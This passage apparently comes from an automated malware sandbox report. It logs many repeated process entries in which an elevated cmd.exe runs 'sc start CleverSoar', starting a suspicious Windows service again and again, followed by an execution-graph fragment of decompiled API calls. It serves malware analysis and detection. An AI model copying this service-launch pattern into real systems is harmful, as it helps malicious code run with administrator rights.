                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:51
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:52
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:53
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:54
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:55
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:56
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:57
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:58
                                        Start time:01:40:37
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:59
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:60
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:61
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:62
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:63
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:64
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:65
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:66
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:67
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:68
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:69
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:70
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:71
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:72
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:73
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:74
                                        Start time:01:40:38
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:75
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:76
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:77
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:78
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:79
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:80
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:81
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:82
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:83
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:84
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:85
                                        Start time:01:40:39
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:86
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:87
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:88
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:89
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:90
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:91
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:92
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:93
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:94
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:95
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:96
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:97
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:98
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:99
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:100
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:101
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:102
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:103
                                        Start time:01:40:40
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:104
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:105
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:106
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:107
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:108
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:sc start CleverSoar
                                        Imagebase:0x7ff70cca0000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:109
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:110
                                        Start time:01:40:41
                                        Start date:23/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:cmd /c start sc start CleverSoar
                                        Imagebase:0x7ff766740000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:2.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:15%
                                          Total number of Nodes:833
                                          Total number of Limit Nodes:10
_strlen 66881->66885 66882 6c7b6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66882->66885 66883 6c7aaec0 FindFirstFileA 66883->66885 66884 6c64a292 Sleep 66903 6c649bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 66884->66903 66885->66871 66885->66882 66885->66883 66885->66884 66902 6c64e619 66885->66902 66886 6c646624 66889 6c7b6a43 std::_Facet_Register 4 API calls 66886->66889 66887 6c64660d 66888 6c7b6a43 std::_Facet_Register 4 API calls 66887->66888 66894 6c6465bc _Yarn _strlen 66888->66894 66889->66894 66890->66871 66890->66886 66890->66887 66890->66894 66891 6c649bbd GetCurrentProcess TerminateProcess 66891->66885 66892 6c6563b2 66962 6c6315e0 18 API calls std::ios_base::_Ios_base_dtor 66892->66962 66894->66892 66896 6c646970 66894->66896 66897 6c646989 66894->66897 66900 6c646920 _Yarn 66894->66900 66895 6c6564f8 66898 6c7b6a43 std::_Facet_Register 4 API calls 66896->66898 66899 6c7b6a43 std::_Facet_Register 4 API calls 66897->66899 66898->66900 66899->66900 66901 6c7b5960 104 API calls 66900->66901 66904 6c6469d6 std::ios_base::_Ios_base_dtor _strlen 66901->66904 66905 6c64f243 CreateFileA 66902->66905 66903->66871 66903->66885 66903->66891 66903->66892 66925 6c7b5960 104 API calls 66903->66925 66957 6c7b6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66903->66957 66960 6c7b4ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 66903->66960 66904->66871 66907 6c646dd2 66904->66907 66908 6c646dbb 66904->66908 66919 6c646d69 _Yarn _strlen 66904->66919 66913 6c64f2a7 66905->66913 66906 6c6502ca 66910 6c7b6a43 std::_Facet_Register 4 API calls 66907->66910 66909 6c7b6a43 std::_Facet_Register 4 API calls 66908->66909 66909->66919 66910->66919 66911 6c647427 66914 6c7b6a43 std::_Facet_Register 4 API calls 66911->66914 66912 6c647440 66915 6c7b6a43 std::_Facet_Register 4 API calls 66912->66915 66913->66906 66918 6c6502ac 
